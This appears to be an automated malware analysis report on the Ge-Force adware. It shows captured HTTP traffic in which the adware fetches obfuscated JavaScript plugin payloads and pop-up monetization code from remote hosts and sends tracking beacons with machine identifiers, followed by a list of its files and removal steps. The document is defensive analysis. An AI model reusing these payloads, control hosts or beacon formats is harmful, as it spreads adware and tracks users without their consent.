    GET /plugins/mins/356.js?ver=1&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1418564745"
    Last-Modified: Sun, 14 Dec 2014 13:45:45 GMT
    Cache-Control: max-age=20
    Content-Length: 407
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058083.dop002.ny2.t,1421058083.cds012.ny2.c
    appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
    f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
    monetization.plugins={};}appAPI.internal.monetization.plugins[356]=fun
    ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
    on.shouldRunByVertical(356,["pops"])){return;}new (appAPI.internal.mon
    etization.plugins.ICMBaseManager({namespace:"MAN"}))();};    ....


    GET /plugins/mins/193.js?ver=9&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1408273131"
    Last-Modified: Sun, 17 Aug 2014 10:58:51 GMT
    Cache-Control: max-age=804
    Content-Length: 867
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058084.dop002.ny2.t,1421058084.cds009.ny2.c
    if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MD
    IwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEy
    MDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YT
    FiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0
    MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1ND
    UxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2
    NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0Nj
    UyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1
    MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMT
    kwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNl
    MzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0Zj
    JjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0
    ZjdhMWI=', 'fhsakzfpmp'); }    ....


    GET /plugins/mins/288.js?ver=1&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1404660469"
    Last-Modified: Sun, 06 Jul 2014 15:27:49 GMT
    Cache-Control: max-age=451
    Content-Length: 551
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058083.dop002.ny2.t,1421058083.cds004.ny2.c
    if (typeof setup2 === 'function') { setup2('MTg2ZTU3NDU1MTRiNGQwZTBlMD
    MxMzMxMDUwOTUzNTE0ZjQ0MTIwMzE3MTQ0ZDRhNWUwMjFjMTIxYjAzMGEwNzU5MDExMDFm
    MGUwMDFiMDQxNzAzMDIxNzA0NDUwNjA4MWMxODRjMDIxODRhMWMwMjAxNDkxOTA1MTIwNz
    U5MGYwMjU0MDcwZjFlNGEzYzNiMzQzNzNlMzgzYzM0MzMzMzI2MzYyODMwMjIyZTNkMzkz
    MzMzM2MzYjUxMDcxZjBhMDIwMzQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMxM2IzNjM1Mj
    EzNDIxMjczNzMyM2MzYjUxMTYwNDA5MDYwMjQ3MjgzYzI3MjUyYTIyMzgzZDJmM2UzMjMx
    M2IzMjNkMjUyZTIxMjIzZjMzM2MzNzIyMjcyZTIyMmIzOTI1NTU0ZjZlNTc0NTUxNGI0ZD
    E2MTYwMjA0MGQxOTJjMTU0OTU1NDY0ODRmNWI2ZTBh', 'cdweqkofzw'); }    ..
    ..


    GET /plugins/mins/184.js?ver=11&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420026483"
    Last-Modified: Wed, 31 Dec 2014 11:48:03 GMT
    Cache-Control: max-age=205
    Content-Length: 1231
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058084.dop002.ny2.t,1421058084.cds013.ny2.c
    if (typeof setup2 === 'function') { setup2('MDI2YjcwNTgwZTE4MDQxNzJjMW
    QxNTQzNDM1YTQ0MDQwNDEzMDk1NTU2NGUxNzBhMTU0MjAwMDYwYTFiMTgwZDFjMWIwMjFm
    NWUwNDE2MDI1NjBmMDkwOTA0NDMxYzA4MWUwNjFhNGYxMzA5NTkyMzAyMGUxZTA2MTcyOD
    FkNDcyMzU0MzE1MzM4NWQ0YTIwNTQzODU2NWY0NDRhM2M1ZDQ4NTA1NDNiNWYyZDQwNGE0
    OTVmNDg1NDQ4NGQyMjVkNDAyMTRmMmE1ZjMyMTAwZTAzMjUxNDVhMmEwZTE1MDQwYTVjMz
    YwZDAyMTMxNzBhMGIyODNkNDc1NDVjNDA1NzQ5NDkyOTEzMTYxZTEzMGYwNDI5MTgwMjFj
    NWMyNjI1MjUzZTNmMzQyYTNkMzAyNTNjMjgzOTJkMjAzNzI2MjEzODJjM2MyNTM5NGEyND
    A4MTYwMzFiMDAwYjMzMDI1MTJmMzgzYTNkMzYzMjJhMjgyZjI4MzUzNTI2MmEyMTM1M2Mz
    NDIyMjkzNDM4MmEzYTNiM2UzMDNlMzkzMzUyNGI3MzY2NWIwOTBkMGUxNjFmMjUxNTE1NG
    Q0MzQxNWIxMjEyMTgwMDE0NDM0MDU2MGYwOTA5NDgxYzExMTQwZDBlMTUwNDE4MWUxNTQy
    MTMwODE0NDAxNzExMGExODQ5MDAxZjAwMTAwYzU3MGIwYTQ1MjkxZTE5MDAxMDAxMzAwNT
    Q0M2Y1ZTJkNDQyNjRiNWMzODRjM2I0YTU1NTg1ZDIyNGI1ZTQ4NGMzODQzMjc1YzVkNTc0
    OTVlNGM1MDRlM2U1NzVjMzY1MTNjNDkyYTA4MGQxZjJmMDg0ZDM0MTgwMzFjMTI1ZjJhMD
    cxZTA0MDkxYzFkMzAyNTQ0NDg1NjVjNDA1NzVmM2YwYjBlMWQwZjA1MTgzZTA2MTQwYTQ0
    M2UyNjM5MzQyMzIzMzQyYjI2M2QyNDJiMjUyNzNjMjAzODM3MmUzNDI0MjYyNTQwMzgxZj
    A4MTUwZDE4MTMzMDFlNWIzMzJmMjQyYjIwMmEzMjJiMzMyMjI5MjIzODNjMzcyZDI0Mzcz
    ZTIzMjgyZjM0MmMyZDI2MjgzZDI1Mzk0ZTVjNmQ3MDRkMDkwZDBjMWQwZjAyMzkwMzViNT
    U1OTUwNDE0ZTZjMTE3YQ==', 'yayzflpgyo'); }..
    <<< skipped >>>
    

    GET /stats.gif?action=daily&app=69129&bic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&ver=1_35_12_18&installtime=1421039403&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001729&subid=0&zdata=0&appver=27&bgver=1&pluginsver=23&curtime=1421039418&lifetime=15&rnd=6909 HTTP/1.1
    Accept: */*
    Host: stats.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    x-amz-id-2:  qMg0Euses8OGBO03Gf2RtEI4hB2UE6umJ6UcUQCqMJkI7rL4hUOZpdc3VYKbg/B
    x-amz-request-id: 00E59B0A66C91640
    Date: Mon, 12 Jan 2015 10:21:28 GMT
    Cache-Control: no-cache, must-revalidate
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Tue, 25 Feb 2014 00:10:58 GMT
    ETag: "28d6814f309ea289f847c69cf91194c6"
    Content-Type: image/gif
    Content-Length: 35
    Server: AmazonS3
    GIF89a.............,...........D..;..

    

    GET /plugins/mins/262.js?ver=2&rnd=41 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1411293488"
    Last-Modified: Sun, 21 Sep 2014 09:58:08 GMT
    Cache-Control: max-age=783
    Content-Length: 1075
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058084.dop005.ny2.t,1421058084.cds045.ny2.c
    if (typeof setup2 === 'function') { setup2('MWY2MTUyNDE0NzU3NDcwZTEyMD
    AxNDNlMDAwZDQ1NGQ0NTQ0MGUwMDEwMWI0ODRlNDgxNDAxMDgwNTE1MDcwMzE3NTA0YTE2
    NGIwNzBkMTUwOTBhMWIwOTAzNTkwYjAzMTI1YjE3MWUxMDRlMTE0NDU3NTc1ZjE2MDA0ND
    JkM2UyNDI1MmEzNTM1MjYyZDJmMzczMzM4MzIzZDMyMjMzYTIwMmUzNjNlMzQyMjI3Mzky
    ZjMwM2IzNDVkMGQ0OTFkMTY1OTE2MWQwMDU2NDM1NjU1NDc0MzAzMWUwMDU5MzQyZDIyMz
    UzODM2MzUzNDNkMjAyZTIwM2UyNjI3MzUzOTI4MzUyOTJlMmQzZTQxMDQxYzE1MTIxMTA5
    MDIxNjVjMzgyODI2MzQyOTI3MzczOTNiMjUyMjI1M2EyZjI4MjczMDJhM2UyZDIyMjUzYT
    MzMzUzMTM2MzQzYjI1MzgyODQ3NGE2YzU0NDQ0YjUyNDMwZjAzMTExNjE1MjExNjA3NTA1
    YjQ3NTUwZDEyMTIwNDE3NTE1ZDRlMDQxMzBiMDUwNzE3MGMwZTQzNGMwNjU5MDQwZDA3MT
    kwNTAyMWEwNTQ5MTkwMDEyNDkwNzExMDk1ZDE3NTQ0NTU0NWYwNDEwNGIzNDJkMjIzNTM4
    MzYzNTM0M2QyMDJlMjAzZTIyMmYzMTIzMjgzMDIxMmYyZDMyMzIzNTNhMmYyMjJiM2I0ND
    FlNGYwZDA0NWExNjBmMTA1OTVhNDU1MzU3NTEwMDFlMTI0OTNiMzQzMTMzMjgyNDM2MzQy
    ZjMwMjEzOTJkMjAzNzI3M2EyODI3MzkyMTM0MmQ0NzE0MGUxNjEyMDMxOTBkMGY0ZjNlMz
    gzNDM3MjkzNTI3MzYyMjM2MjQzNTI4MmMyODM1MjAyNTI3M2UyNDM1MjgzMDM1MjMyNjNi
    MjIzNjNlMzg1NTQ5NmM0NjU0NDQ0YjUwMTEwYjAyMDIwZjA4M2QwMDQ5NDg0MTU1NDE1Nz
    ZjMWI=', 'dkragwefft'); }    ....


    GET /plugins/mins/350.js?ver=1&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1417707239"
    Last-Modified: Thu, 04 Dec 2014 15:33:59 GMT
    Cache-Control: max-age=694
    Content-Length: 1799
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058083.dop005.ny2.t,1421058083.cds012.ny2.c
    if (typeof setup2 === 'function') { setup2('MTE3MzRlNTI0NjVhNDAwZDAyMG
    UxYTJjMWMxZTQ0NDA0MjQ3MWUwZTFlMDk1NDVkNDkxOTA2MGI1ODE5MDUxNzFkMDYwMjFi
    MTYwNDE4MWYxZTU3MGQxZDBiNTUwYzAyMDMxYjFjMTg0MTFlNDgxMDExNWExNTFiMDcwOT
    BmMWIwMTE0MmIwMTRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZDMzMmIyYTNkMmMz
    MjI1MzU1ZjBkMWQxMzE0MTYxNzBmMzkwNTFkMGI0ZjM5MjUyMTM3MzkyOTM5MmIyNzM2Mj
    MyODNkMjYzOTJmMjQyZDNjMmIzOTM5MmQyMTMzMjUzNTVmMGMwMDA5MGQxMTAwMDQzOTA1
    MWQwYjRmMzkyNTIxMzczOTI5MzkyYjI3MzYyMzI4M2QyNzI0MzUzZDJhMmIyMDM5MjU0ND
    A0MDYwYTIzM2Q1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2MjUyMzNkMzEy
    ZDQwMWIxMjE1MzgxYjA3MWM1MzJkMzkzOTMwMmEyNTI5MzgzMDJhMzczNDI1MjMzNTI2Mj
    UyNDM4MjMzNzM5MjU0NDJjMzQzMzI5NDQzMTJkMjUyODJkMzYyNTI4MjMzZDJiMjAzOTMz
    MmMzNjIyM2IyNjM1MmIyMDM5MmYzMTIwMjQyNTIzM2QzMTJkNDAwOTE3MDczZjNlNTcyNj
    MxMzEzNDM1MzEzNjI0MzMyZTNjM2MyZDIzMjIzNjIwMzgzZTJmM2QzMTIxMzMzODNkMmMz
    MjI1MzU1ZjFjNGYzOTI1MzAyYjMyMjUzNTViNDI3ODQ2NWE0MjQ1NTQxMjFlMGQxZTAxMz
    MwODBlNDc0YzVhNDgxMTFhMDYxNjA5NTg0YTU5MWU1ODE4NTYxMzUyMGI1YjRiMDUwOTA2
    NTcwNjA1MDUxZTBjNGIxODFmMWU1NjAwMTUxMzFiMTQwNDU5MTY0NDEzMWQ0ZDA1MWIwZj
    E1MTcxMzBkMTcyNzE2NWIyNTNkMjYyNDM1MzkyYTNjM2IyMjNmMzAzYTM1M2IyNzI5MzEz
    YjIyMjUzZDQzMTUxNTFmMTcxYTAwMWYzOTBkMDExMzQ3MzUyNjJkMjAyOTI5MzEzNzNmM2
    UyZjJiMzEzMTI5MmYyYzMxMjQyMzM1M2EyMTM2MjMyNTNkNDMxNDA4MDUwZTFkMTcxNDM5
    MGQwMTEzNDczNTI2MmQyMDI5MjkzMTM3M2YzZTJmMmIzMTMwMzQzNTM1MzYzMzI4MzUyNj
    Q4MTMxNjBhMmIyMTRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZjIyMzYyNTJiMjEy
    OTI1NGMxODFlMDIyODFiMGYwMDRiMjUzNTNhM2MzZDM1MjkzMDJjMzIzZjM4MjYyZjIyMz
    YyNTJjMjQzYjNmMzUyNjQ4M2IyNDMzMjE1ODI5MjUyOTJiMjEyMTM1MjgyYjIxMzMy
    <<< skipped >>>

    GET /plugins/mins/337.js?ver=1&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1417094308"
    Last-Modified: Thu, 27 Nov 2014 13:18:28 GMT
    Cache-Control: max-age=675
    Content-Length: 407
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058084.dop005.ny2.t,1421058084.cds002.ny2.c
    appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeo
    f appAPI.internal.monetization.plugins==="undefined"){appAPI.internal.
    monetization.plugins={};}appAPI.internal.monetization.plugins[337]=fun
    ction(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetizati
    on.shouldRunByVertical(337,["pops"])){return;}new (appAPI.internal.mon
    etization.plugins.ICMBaseManager({namespace:"TEN"}))();};    ....


    GET /plugins/mins/91.js?ver=118&rnd=41 HTTP/1.1
    

    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsdemosrv.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:24 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1421049626"
    Last-Modified: Mon, 12 Jan 2015 08:00:26 GMT
    Cache-Control: max-age=50
    Content-Length: 185222
    Content-Type: application/x-javascript; charset=UTF-8
    X-HW: 1421058084.dop005.ny2.t,1421058084.cds002.ny2.c
    (function(M){var A=[].slice;var z={};var a=function(ar){if(typeof ar==
    "string"&&typeof ar.trim=="function"){return ar.trim();}return ar==nul
    l?"":ar.toString().replace(/^\s /,"").replace(/\s $/,"");};function f(
    ar){var at=z[ar]={},au,av;ar=ar.split(/\s /);for(au=0,av=ar.length;au&
    lt;av;au  ){at[ar[au]]=true;}return at;}var H=function(ar,at){var av=[
    ];for(var au=0;au<ar.length;au  ){if(au in ar){var aw=at(ar[au],au,
    ar);if(aw!=null){av.push(aw);}}}return av;};var ad=function(av,ay,au){
    var at,aw=0,ax=av.length,ar=ax===undefined||appAPI.utils.isFunction(av
    );if(au){if(ar){for(at in av){if(ay.apply(av[at],au)===false){break;}}
    }else{for(;aw<ax;){if(ay.apply(av[aw  ],au)===false){break;}}}}else
    {if(ar){for(at in av){if(ay.call(av[at],at,av[at])===false){break;}}}e
    lse{for(;aw<ax;){if(ay.call(av[aw],aw,av[aw  ])===false){break;}}}}
    return av;};var J=function(au){au=au?(z[au]||f(au)):{};var az=[],aA=[]
    ,av,aw,at,ax,ay,aC=function(aD){var aE,aH,aG,aF,aI;for(aE=0,aH=aD.leng
    th;aE<aH;aE  ){aG=aD[aE];aF=appAPI.utils.isArray(aG)?"array":(appAP
    I.utils.isFunction(aG)?"function":"");if(aF==="array"){aC(aG);}else{if
    (aF==="function"){if(!au.unique||!aB.has(aG)){az.push(aG);}}}}},ar=fun
    ction(aE,aD){aD=aD||[];av=!au.memory||[aE,aD];aw=true;ay=at||0;at=0;ax
    =az.length;for(;az&&ay<ax;ay  ){if(az[ay].apply(aE,aD)===false&&au.
    stopOnFalse){av=true;break;}}aw=false;if(az){if(!au.once){if(aA&&aA.le
    ngth){av=aA.shift();aB.fireWith(av[0],av[1]);}}else{if(av===true){aB.d
    isable();}else{az=[];}}}},aB={add:function(){if(az){var aD=az.leng
    <<< skipped >>>
    

    GET /monetization.gif?event=3&ibic=589912D45CE0412C9CDE01D4C96E2298IE&verifier=7d6635bb3acc762051a59407230a02ec&campaign=001729&country=ca&app=69129&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1421039403&asw=0_1073750528_-2147483648_0&browser=ie,de&rnd=1421039403 HTTP/1.1
    Host: logs.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:18 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1389114507"
    Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
    Cache-Control: max-age=86400
    Content-Length: 35
    Content-Type: image/gif
    X-HW: 1421058078.dop007.ny2.t,1421058078.cds053.ny2.c
    GIF89a.............,...........D..;..

    

    GET /plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=27&rnd=8405 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:28 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420713954"
    Last-Modified: Thu, 08 Jan 2015 10:45:54 GMT
    Cache-Control: max-age=895
    Content-Length: 1679
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1421058088.dop005.ny2.t,1421058088.cds005.ny2.c
    <?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>.  <V
    er>27</Ver>.  <ShortName>Ge-Forces 1.1</ShortName>
    ;.  <Description>Ge-Force</Description>.  <PublisherNam
    e>iWebar</PublisherName>.  <HomePageLink>NA</HomePag
    eLink>.  <JSLink>hXXp://js.newstatsdemosrv.com/plugin/apps/69
    129/js/na/ie/app_code.js</JSLink>.  <GroupID>0</GroupID
    >.  <Domain>NA</Domain>.  <RunInIframe>false</
    RunInIframe>.  <ThanksURL>NA</ThanksURL>.  <EmailSig
    nature>NA</EmailSignature>.  <SettingsURL>NA</Settin
    gsURL>.  <CertifiedInstall>NA</CertifiedInstall>.  <
    ExposeSites>NA</ExposeSites>.  <RemoteFBApiURL>NA</R
    emoteFBApiURL>.  <DisableIE>true</DisableIE>.  <Disa
    bleFF>true</DisableFF>.  <EnableSearchIE>false</Enab
    leSearchIE>.  <EnableSearchFF>false</EnableSearchFF>.  
    <AddressbarIE>NA</AddressbarIE>.  <AddressbarFF>NA&l
    t;/AddressbarFF>.  <AddressbarFFEnhanced>NA</AddressbarFFE
    nhanced>.  <AddressbarCR>NA</AddressbarCR>.  <NewTab
    URL>NA</NewTabURL>.  <NewTabEmbed>NA</NewTabEmbed>
    ;.  <OpenSearchURL>NA</OpenSearchURL>.  <BackgroundJS&g
    t;hXXp://js.newstatsdemosrv.com/plugin/apps/69129/bg/na/ie/bg_code.js&
    lt;/BackgroundJS>.  <BackgroundVer>1</BackgroundVer>.  
    <Manifest>NA</Manifest>.  <ChangePrevious>false&
    <<< skipped >>>
    

    GET /plugin/apps/69129/manifest/1_35_12_18/ie6/manifest.xml?ver=9&rnd=7431 HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    Host: js.newstatsclientcloud.com
    Connection: Keep-Alive
    Cache-Control: no-cache


    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2015 10:21:23 GMT
    Keep-Alive: timeout=10, max=100
    Connection: Keep-Alive
    Accept-Ranges: bytes
    ETag: "1420713954"
    Last-Modified: Thu, 08 Jan 2015 10:45:54 GMT
    Cache-Control: max-age=900
    Content-Length: 1679
    Content-Type: text/xml; charset=UTF-8
    X-HW: 1421058083.dop006.ny2.t,1421058083.cds005.ny2.pr
    <?xml version="1.0" encoding="UTF-8"?>.<CrAppInfo>.  <V
    er>27</Ver>.  <ShortName>Ge-Forces 1.1</ShortName>
    ;.  <Description>Ge-Force</Description>.  <PublisherNam
    e>iWebar</PublisherName>.  <HomePageLink>NA</HomePag
    eLink>.  <JSLink>hXXp://js.newstatsdemosrv.com/plugin/apps/69
    129/js/na/ie/app_code.js</JSLink>.  <GroupID>0</GroupID
    >.  <Domain>NA</Domain>.  <RunInIframe>false</
    RunInIframe>.  <ThanksURL>NA</ThanksURL>.  <EmailSig
    nature>NA</EmailSignature>.  <SettingsURL>NA</Settin
    gsURL>.  <CertifiedInstall>NA</CertifiedInstall>.  <
    ExposeSites>NA</ExposeSites>.  <RemoteFBApiURL>NA</R
    emoteFBApiURL>.  <DisableIE>true</DisableIE>.  <Disa
    bleFF>true</DisableFF>.  <EnableSearchIE>false</Enab
    leSearchIE>.  <EnableSearchFF>false</EnableSearchFF>.  
    <AddressbarIE>NA</AddressbarIE>.  <AddressbarFF>NA&l
    t;/AddressbarFF>.  <AddressbarFFEnhanced>NA</AddressbarFFE
    nhanced>.  <AddressbarCR>NA</AddressbarCR>.  <NewTab
    URL>NA</NewTabURL>.  <NewTabEmbed>NA</NewTabEmbed>
    ;.  <OpenSearchURL>NA</OpenSearchURL>.  <BackgroundJS&g
    t;hXXp://js.newstatsdemosrv.com/plugin/apps/69129/bg/na/ie/bg_code.js&
    lt;/BackgroundJS>.  <BackgroundVer>1</BackgroundVer>.  
    <Manifest>NA</Manifest>.  <ChangePrevious>false&
    <<< skipped >>>

    The Worm connects to the servers at the folowing location(s):

    Explorer.EXE_2032_rwx_00E70000_00002000:

    SHELL32.DLL
    ShellExecuteA
    KERNEL32.DLL
    .rsrc
    .text

    Explorer.EXE_2032_rwx_00E80000_00001000:

    |explorer.exeM_2032_


    Remove it with Ad-Aware

    1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. Update the definition files.
    3. Run a full scan of your computer.


    Manual removal*

    1. Terminate malicious process(es) (How to End a Process With the Task Manager):

      Ge-Force-codedownloader.exe:2504
      Ge-Force-codedownloader.exe:2564
      regsvr32.exe:2416
      Khtmovq.exe:664
      %original file name%.exe:1616
      mscorsvw.exe:172
      Ge-Force-bg.exe:2632

    2. Delete the original Worm file.
    3. Delete or disinfect the following files created/modified by the Worm:

      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (869 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\184[1].js (25 bytes)
      %Program Files%\Ge-Force\utils.exe (86583 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (685 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (10 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (63 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (429 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (485 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (6584 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (953 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (921 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (35246 bytes)
      %WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.job (74 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (3312 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (415 bytes)
      %Program Files%\Ge-Force\Ge-Force.ico (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\288[1].js (551 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (7 bytes)
